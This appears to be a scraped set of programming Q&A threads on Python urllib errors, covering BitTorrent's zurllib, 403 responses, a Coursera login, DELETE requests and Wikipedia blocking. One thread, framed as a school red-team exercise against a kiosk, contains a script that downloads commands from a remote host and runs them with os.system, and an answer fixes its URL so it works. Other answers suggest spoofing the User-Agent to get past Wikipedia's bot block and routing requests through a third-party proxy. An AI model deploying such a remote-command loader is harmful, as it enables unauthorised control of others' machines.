I found an old source of Bram Cohen's original BitTorrent here:
http://bittorrent.cvs.sourceforge.net/viewvc/bittorrent/?hideattic=0
(according to the question "Where to find BitTorrent source code?", it's version 3.x)
and I'm trying to run it on my Mac (OS X 10.7) with Python 2.7.
If you download the source, you can try running btdownloadcurses.py or btdownloadheadless.py.
I tried running:
$ ./btdownloadcurses.py --url http://sometorrenthost/somefile.torrent
Ok, I'll be more specific. This is what I did:
$ ./btdownloadcurses.py --url http://torcache.net/torrent/848A6A0EC6C85507B8370E979B133214E5B5A6D4.torrent
And this is what I got:
Traceback (most recent call last):
  File "./btdownloadcurses.py", line 243, in <module>
    run(mainerrlist, argv[1:])
  File "./btdownloadcurses.py", line 186, in run
    download(params, d.chooseFile, d.display, d.finished, d.error, mainkillflag, fieldw)
  File "/Users/joal21/Desktop/BitTorrent/BitTorrent/download.py", line 120, in download
    h = urlopen(config['url'])
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 517, in http_response
    code, msg, hdrs = response.code, response.msg, response.info()
AttributeError: addinfourldecompress instance has no attribute 'msg'
When I searched for that AttributeError, I came to:
http://mail.python.org/pipermail/python-bugs-list/2005-May/028824.html
I think the second comment has something to do with my problem, but I don't know how to proceed from there. Am I simply passing the wrong URL? Does it have something to do with the Python version, or with the BitTorrent source being old? Is there something new in present-day .torrent files? What am I missing or not doing?
Forgive my ignorance. I'm really at a loss here.
Bram developed against an older version of Python, one whose urllib2 did not yet set .msg and .code attributes on addinfourl response objects, so his addinfourldecompress wrapper class never needed to expose them. Your newer urllib2 reads those attributes in http_response(), which is exactly where your traceback fails.
The workaround is to copy those attributes yourself from the wrapped addinfourl object, in the HTTPContentEncodingHandler class found in BitTorrent's zurllib.py file:
class HTTPContentEncodingHandler(HTTPHandler):
    """Inherit and add gzip/deflate/etc support to HTTP gets."""
    def http_open(self, req):
        # add the Accept-Encoding header to the request
        # support gzip encoding (identity is assumed)
        req.add_header("Accept-Encoding","gzip")
        req.add_header('User-Agent', 'BitTorrent/' + version)
        if DEBUG:
            print "Sending:"
            print req.headers
            print "\n"
        fp = HTTPHandler.http_open(self,req)
        headers = fp.headers
        if DEBUG:
            pprint.pprint(headers.dict)
        url = fp.url
        resp = addinfourldecompress(fp, headers, url)
        # copy the attributes a newer urllib2 expects onto the wrapper
        resp.code = fp.code
        resp.msg = fp.msg
        return resp
Related
I have a script that is supposed to read a text file from a remote server, and then execute whatever is in the txt file.
For example, if the text file contains the command "ls", the computer will run it and list the directory.
Also, please don't suggest using urllib2 or whatever; I want to stick with Python 3.x.
As soon as I run it, I get this error:
Traceback (most recent call last):
  File "test.py", line 4, in <module>
    data = urllib.request.urlopen(IP_Address)
  File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 222, in urlopen
    return opener.open(url, data, timeout)
  File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 509, in open
    req = Request(fullurl, data)
  File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 328, in __init__
    self.full_url = url
  File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 354, in full_url
    self._parse()
  File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 383, in _parse
    raise ValueError("unknown url type: %r" % self.full_url)
ValueError: unknown url type: 'domain.com/test.txt'
Here is my code:
import os
import urllib.request

IP_Address = "domain.com/test.txt"
data = urllib.request.urlopen(IP_Address)
for line in data:
    print("####")
    os.system(line.decode().strip())  # urlopen yields bytes; decode before running
Edit:
Yes, I realize this is a bad idea. It is a school project; we are playing red team and are supposed to get access to a kiosk. I figured that instead of writing code to get around intrusion detection and firewalls, it would be easier to execute commands from a remote server. Thanks for the help, everyone!
The error occurs because your URL does not include a scheme. Prepend "http://" (or "https://" if the server supports TLS) and it should work.
As others have commented, this is a dangerous thing to do since someone could run arbitrary commands on your system this way.
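If you want to handle the missing scheme defensively in code, here is a minimal sketch (assuming Python 3, as the question requires; "domain.com" is the placeholder host from the question):
import urllib.parse
import urllib.request

url = "domain.com/test.txt"
# urlopen() requires a full URL; prepend a scheme if one is missing
if not urllib.parse.urlparse(url).scheme:
    url = "http://" + url  # or "https://" where the server supports TLS

data = urllib.request.urlopen(url)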
Try
"http://localhost/domain.com/test.txt"
or the remote address. If you use localhost, you need to run an HTTP server there first.
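If you take the localhost route, Python's built-in server is enough for testing; a quick sketch (the port and serving directory are assumptions):
from http.server import HTTPServer, SimpleHTTPRequestHandler

# Serve the current directory at http://localhost:8000/ so that
# http://localhost:8000/test.txt resolves; equivalent to running
# "python -m http.server 8000" from a shell.
HTTPServer(('localhost', 8000), SimpleHTTPRequestHandler).serve_forever()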
The problem begins with this link:
https://i1.pixiv.net/img-zip-ugoira/img/2017/04/05/00/24/41/62259492_ugoira600x600.zip
The file downloaded with a regular downloader is complete.
But when I try to use Python to download the file:
from urllib import request
import sys
request.urlretrieve('https://i1.pixiv.net/img-zip-ugoira/img/2017/04/05/00/24/41/62259492_ugoira600x600.zip', '123.zip')
Traceback (most recent call last):
  File "C:/Users/ssshooter/PycharmProjects/first/111.py", line 3, in <module>
    request.urlretrieve('https://i1.pixiv.net/img-zip-ugoira/img/2017/04/05/00/24/41/62259492_ugoira600x600.zip', '123.zip')
  File "C:\Users\ssshooter\AppData\Local\Programs\Python\Python36\lib\urllib\request.py", line 248, in urlretrieve
    with contextlib.closing(urlopen(url, data)) as fp:
  File "C:\Users\ssshooter\AppData\Local\Programs\Python\Python36\lib\urllib\request.py", line 223, in urlopen
    return opener.open(url, data, timeout)
  File "C:\Users\ssshooter\AppData\Local\Programs\Python\Python36\lib\urllib\request.py", line 532, in open
    response = meth(req, response)
  File "C:\Users\ssshooter\AppData\Local\Programs\Python\Python36\lib\urllib\request.py", line 642, in http_response
    'http', request, response, code, msg, hdrs)
  File "C:\Users\ssshooter\AppData\Local\Programs\Python\Python36\lib\urllib\request.py", line 570, in error
    return self._call_chain(*args)
  File "C:\Users\ssshooter\AppData\Local\Programs\Python\Python36\lib\urllib\request.py", line 504, in _call_chain
    result = func(*args)
  File "C:\Users\ssshooter\AppData\Local\Programs\Python\Python36\lib\urllib\request.py", line 650, in http_error_default
    raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 403: Forbidden
It doesn't work.
The differences between your browser's request and your script's request are:
You're using different SSL information: your browser has a built-in set of certificate authorities, while Python uses a set that comes with the OS. They differ, and if the site you're accessing uses one known to your browser but not to Python, Python will throw an exception.
You're accessing the site with different User-Agents: your browser tells the server it's Chrome or IE or whatever, while Python tells the server it's Python. For whatever reason, the server may decide it doesn't like that and return Forbidden.
The server may be working harder than you think: while it appears the request is for a simple file, you're really requesting a resource. It may be (though unlikely in this case) that the resource you're requesting results in multiple interactions between the server and your browser (cookies, JavaScript, etc.) which execute successfully in your browser and are returned to the server, which then delivers the file. Your Python request does none of that.
Your browser may have existing state which your Python does not. You say you can access the file using your browser, but that may work only because you've previously accessed other resources on the site, or logged in, or whatever. Your browser communicates that information (perhaps a session id via a cookie?) and the server recognizes it. Your Python code starts with no previous state, so the server forbids the request.
Which is it in this case? You'll need to investigate. Can you get wget or curl to work? Debug your browser's access: what headers are being sent, and what do you receive in reply?
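A cheap first experiment from Python is to retry the download with browser-like headers; a minimal sketch (the User-Agent and Referer values are assumptions, not anything the server documents):
from urllib import request

url = ('https://i1.pixiv.net/img-zip-ugoira/img/2017/04/05/00/24/41/'
       '62259492_ugoira600x600.zip')
req = request.Request(url, headers={
    'User-Agent': 'Mozilla/5.0',          # pretend to be a browser
    'Referer': 'https://www.pixiv.net/',  # some image hosts also check this
})
with request.urlopen(req) as resp, open('123.zip', 'wb') as out:
    out.write(resp.read())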
I had learned a lot from MOOCs, so I wanted to give something back to them. For this purpose I was thinking of designing a small app in Kivy, which requires a Python implementation. What I wanted to achieve was to log in to my Coursera account programmatically and collect information about the courses I am currently pursuing. For this I first have to log in to Coursera ( https://accounts.coursera.org/signin?post_redirect=https%3A%2F%2Fwww.coursera.org%2F ). Upon searching the web I came across this piece of code:
import urllib2, cookielib, urllib
username = "abcdef#abcdef.com"
password = "uvwxyz"
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
login_data = urllib.urlencode({'username' : username, 'password' : password})
info = opener.open("https://accounts.coursera.org/signin",login_data)
for line in info:
    print line
and some similar snippets as well, but none of them worked for me; every approach led to this type of error:
Traceback (most recent call last):
  File "C:\Python27\Practice\web programming\coursera login.py", line 9, in <module>
    info = opener.open("https://accounts.coursera.org/signin",login_data)
  File "C:\Python27\lib\urllib2.py", line 410, in open
    response = meth(req, response)
  File "C:\Python27\lib\urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "C:\Python27\lib\urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "C:\Python27\lib\urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "C:\Python27\lib\urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 404: Not Found
Is the error due to the HTTPS protocol, or is there something I am missing?
I don't want to use any 3rd party libraries.
I'm using requests for this purpose and I think it is a great Python library. Here is some example code showing how it could work:
import requests
from requests.auth import HTTPBasicAuth
credentials = HTTPBasicAuth('username', 'password')
response = requests.get("https://accounts.coursera.org/signin", auth=credentials)
print response.status_code
# if everything was fine, this prints: 200
Here is the link to requests:
http://docs.python-requests.org/en/latest/
I think you need to use the HTTPBasicAuthHandler class of urllib2. Check the 'Basic Authentication' section: https://docs.python.org/2/howto/urllib2.html
And I strongly recommend the requests module; it will make your code better. http://docs.python-requests.org/en/latest/
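For completeness, a minimal sketch of that handler, assuming the endpoint really uses HTTP Basic Authentication (Coursera's actual sign-in flow may not):
import urllib2

password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
# None means "any realm"; the URL prefix scopes the credentials
password_mgr.add_password(None, "https://accounts.coursera.org/",
                          "username", "password")
opener = urllib2.build_opener(urllib2.HTTPBasicAuthHandler(password_mgr))
info = opener.open("https://accounts.coursera.org/signin")
print info.read()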
I am trying to use the python-rest-client ( http://code.google.com/p/python-rest-client/wiki/Using_Connection ) to perform testing of some RESTful webservices. Since I'm just learning, I've been pointing my tests at the sample services provided at http://www.predic8.com/rest-demo.htm.
I have no problems creating, updating, or retrieving entries (POST and GET requests). When I try to make a DELETE request, it fails. I can perform DELETE requests with the Firefox REST Client and they work. I can also make DELETE requests against other services, but I've been driving myself crazy trying to figure out why it doesn't work in this case. I'm using Python 3 with an updated httplib2, but I also tried Python 2.5 so that I could use python-rest-client with its included version of httplib2. I see the same problem in either case.
The code is simple, matching the documented use:
from restful_lib import Connection
self.base_url = "http://www.thomas-bayer.com"
self.conn = Connection(self.base_url)
response = self.conn.request_delete('/sqlrest/CUSTOMER/85')
I've looked at the resulting HTTP requests from the browser tool and from my code, and I can't see why one works and the other doesn't. This is the trace I receive:
Traceback (most recent call last):
  File "/home/fmk/python/rest-client/src/TestExampleService.py", line 68, in test_CRUD
    self.Delete()
  File "/home/fmk/python/rest-client/src/TestExampleService.py", line 55, in Delete
    response = self.conn.request_delete('/sqlrest/CUSTOMER/85')
  File "/home/fmk/python/rest-client/src/restful_lib.py", line 64, in request_delete
    return self.request(resource, "delete", args, headers=headers)
  File "/home/fmk/python/rest-client/src/restful_lib.py", line 138, in request
    resp, content = self.h.request("%s://%s%s" % (self.scheme, self.host, '/'.join(request_path)), method.upper(), body=body, headers=headers )
  File "/home/fmk/python/rest-client/src/httplib2/__init__.py", line 1175, in request
    (response, content) = self._request(conn, authority, uri, request_uri, method, body, headers, redirections, cachekey)
  File "/home/fmk/python/rest-client/src/httplib2/__init__.py", line 931, in _request
    (response, content) = self._conn_request(conn, request_uri, method, body, headers)
  File "/home/fmk/python/rest-client/src/httplib2/__init__.py", line 897, in _conn_request
    response = conn.getresponse()
  File "/usr/lib/python3.2/http/client.py", line 1046, in getresponse
    response.begin()
  File "/usr/lib/python3.2/http/client.py", line 346, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python3.2/http/client.py", line 316, in _read_status
    raise BadStatusLine(line)
http.client.BadStatusLine: ''
What's breaking, and what do I do about it? Actually, I'd settle for advice on debugging it. I've changed the domain in my script and pointed it at my own machine so I could view the request. I've also viewed and modified the Firefox requests in Burp Proxy to make them match my script's requests. The modified Burp requests still work, and the Python requests still don't.
Apparently the issue is that the server expects a message body for DELETE requests. That's an unusual expectation for a DELETE, but by specifying Content-Length: 0 in the headers, I'm able to perform DELETEs successfully.
Somewhere along the way (in python-rest-client or httplib2), the Content-Length header is wiped out if I try to do:
from restful_lib import Connection
self.base_url = "http://www.thomas-bayer.com"
self.conn = Connection(self.base_url)
response = self.conn.request_delete('/sqlrest/CUSTOMER/85', headers={'Content-Length':'0'})
Just to prove the concept, I went to the point in the stack trace where the request was happening:
File "/home/fmk/python/rest-client/src/httplib2/__init__.py", line 897, in _conn_request
response = conn.getresponse()
I printed the headers parameter there to confirm that the content length wasn't there, then I added:
if method == 'DELETE':
    headers['Content-Length'] = '0'
before the request.
I think the real answer is that the service is wonky, but at least I got to know httplib2 a little better. I've seen some other confused people looking for help with REST and Python, so hopefully I'm not the only one who got something out of this.
The following script correctly produces 404 response from the server:
#!/usr/bin/env python3
import http.client
h = http.client.HTTPConnection('www.thomas-bayer.com', timeout=10)
h.request('DELETE', '/sqlrest/CUSTOMER/85', headers={'Content-Length': 0})
response = h.getresponse()
print(response.status, response.version)
print(response.info())
print(response.read()[:77])
python -V => 3.2
curl -X DELETE http://www.thomas-bayer.com/sqlrest/CUSTOMER/85
curl: (52) Empty reply from server
The Status-Line is not optional; an HTTP server must return it, or at least send a 411 Length Required response.
curl -H 'Content-length: 0' -X DELETE \
http://www.thomas-bayer.com/sqlrest/CUSTOMER/85
correctly returns 404.
I have a strange bug when trying to urlopen a certain page from Wikipedia. This is the page:
http://en.wikipedia.org/wiki/OpenCola_(drink)
This is the shell session:
>>> f = urllib2.urlopen('http://en.wikipedia.org/wiki/OpenCola_(drink)')
Traceback (most recent call last):
  File "C:\Program Files\Wing IDE 4.0\src\debug\tserver\_sandbox.py", line 1, in <module>
    # Used internally for debug sandbox under external interpreter
  File "c:\Python26\Lib\urllib2.py", line 126, in urlopen
    return _opener.open(url, data, timeout)
  File "c:\Python26\Lib\urllib2.py", line 397, in open
    response = meth(req, response)
  File "c:\Python26\Lib\urllib2.py", line 510, in http_response
    'http', request, response, code, msg, hdrs)
  File "c:\Python26\Lib\urllib2.py", line 435, in error
    return self._call_chain(*args)
  File "c:\Python26\Lib\urllib2.py", line 369, in _call_chain
    result = func(*args)
  File "c:\Python26\Lib\urllib2.py", line 518, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
urllib2.HTTPError: HTTP Error 403: Forbidden
This happened to me on two different systems in different continents. Does anyone have an idea why this happens?
Wikipedia's stance is:
Data retrieval: Bots may not be used to retrieve bulk content for any use not directly related to an approved bot task. This includes dynamically loading pages from another website, which may result in the website being blacklisted and permanently denied access. If you would like to download bulk content or mirror a project, please do so by downloading or hosting your own copy of our database.
That is why the default Python user agent is blocked; you're supposed to download the data dumps instead.
Anyway, you can read pages like this in Python 2:
req = urllib2.Request(url, headers={'User-Agent' : "Magic Browser"})
con = urllib2.urlopen( req )
print con.read()
Or in Python 3:
import urllib.request
req = urllib.request.Request(url, headers={'User-Agent' : "Magic Browser"})
con = urllib.request.urlopen( req )
print(con.read())
To debug this, you'll need to trap that exception.
try:
    f = urllib2.urlopen('http://en.wikipedia.org/wiki/OpenCola_(drink)')
except urllib2.HTTPError, e:
    print e.fp.read()
When I print the resulting message, it includes the following:
"English
Our servers are currently experiencing a technical problem. This is probably temporary and should be fixed soon. Please try again in a few minutes."
Oftentimes websites will filter access by checking whether they are being accessed by a recognised user agent. Wikipedia is just treating your script as a bot and rejecting it. Try spoofing as a browser. The following link takes you to an article that shows you how:
http://wolfprojects.altervista.org/changeua.php
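For instance, here is a sketch that installs a global opener with a spoofed header, so every subsequent urlopen() call sends it (the User-Agent string is an arbitrary assumption):
import urllib2

opener = urllib2.build_opener()
opener.addheaders = [('User-Agent', 'Mozilla/5.0')]  # replaces the default Python-urllib agent
urllib2.install_opener(opener)

f = urllib2.urlopen('http://en.wikipedia.org/wiki/OpenCola_(drink)')
print f.read()[:200]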
Some websites read the headers urllib sends and will block access from scripts to avoid 'unnecessary' usage of their servers. I don't know why Wikipedia does this, but have you tried spoofing your headers?
As Jochen Ritzel mentioned, Wikipedia blocks bots.
However, bots are not blocked if they use the API (api.php).
To get the Wikipedia page titled "love":
http://en.wikipedia.org/w/api.php?format=json&action=query&titles=love&prop=revisions&rvprop=content
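A sketch of calling that endpoint from Python 2 (the User-Agent string is an assumption; Wikipedia asks bots to send a descriptive one):
import json
import urllib2

url = ('http://en.wikipedia.org/w/api.php?format=json&action=query'
       '&titles=love&prop=revisions&rvprop=content')
req = urllib2.Request(url, headers={'User-Agent': 'ExampleBot/0.1'})
data = json.load(urllib2.urlopen(req))
print data['query']['pages'].keys()  # page ids for the 'love' title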
I made a workaround for this using PHP, which is not blocked by the site I needed. It can be accessed like this:
path = 'http://phillippowers.com/redirects/get.php?file=http://website_you_need_to_load.com'
req = urllib2.Request(path)
response = urllib2.urlopen(req)
vdata = response.read()
This will return the HTML code to you.